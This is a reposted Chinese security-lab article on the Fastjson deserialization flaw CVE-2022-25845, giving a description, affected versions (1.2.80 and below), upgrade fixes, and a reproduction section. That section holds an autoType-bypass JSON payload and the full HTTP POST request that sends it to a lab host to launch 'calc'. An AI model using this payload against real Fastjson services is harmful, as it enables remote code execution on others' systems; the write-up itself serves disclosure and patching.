FastJson代码执行漏洞(CVE-2022-25845)
2022-7-15 11:28:4 Author: mp.weixin.qq.com(查看原文) 阅读量:242 收藏

网安引领时代,弥天点亮未来   

0x00写在前面
本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!
0x01简要描述

Fastjson 是阿里巴巴的开源 JSON 解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON字符串,也可以从 JSON 字符串反序列化到 JavaBean。在 Fastjson 1.2.80 及以下版本中存在反序列化漏洞,攻击者可以在特定依赖下利用此漏洞绕过默认autoType 关闭限制,从而反序列化有安全风险的类。

0x02影响版本

FastJson ≤1.2.80

0x03漏洞复现

漏洞payload

{    "@type": "java.lang.Exception",    "@type": "com.github.isafeblue.fastjson.SimpleException",    "domain": "calc"}

下载源码启动环境,发送payload

POST /addComment HTTP/1.1Host: 10.211.55.7:8099Accept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Content-Length: 40Content-Type: application/json; charset=utf-8Cookie: LOGIN_LANG=cnOrigin: http://10.211.55.7:8099Referer: http://10.211.55.7:8099/User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0X-Requested-With: XMLHttpRequest
{ "@type": "java.lang.Exception", "@type": "com.github.isafeblue.fastjson.SimpleException", "domain": "calc"}

成功执行

0x04修复方法

1、升级至版本 FastJson 1.2.83:

https://github.com/alibaba/fastjson/releases/tag/1.2.83

2、升级到 FastJosn v2:

https://github.com/alibaba/fastjson2/releases

 

知识分享完了

喜欢别忘了关注我们哦~

学海浩茫,
予以风动,
必降弥天之润!

   弥  天

安全实验室


文章来源: http://mp.weixin.qq.com/s?__biz=MzU2NDgzOTQzNw==&mid=2247495944&idx=1&sn=af96a6e5b3400077aa06390ce3147b91&chksm=fc46646acb31ed7c46369dd187726aac7b434b1723fdd7c5e9453e5392499e21d34f519cd404&mpshare=1&scene=1&srcid=07159afXTqjX2usERSMTlO25&sharer_sharetime=1657855679032&sharer_shareid=205c037363a9188e37dfb6bb4436f95b#rd
如有侵权请联系:admin#unsafe.sh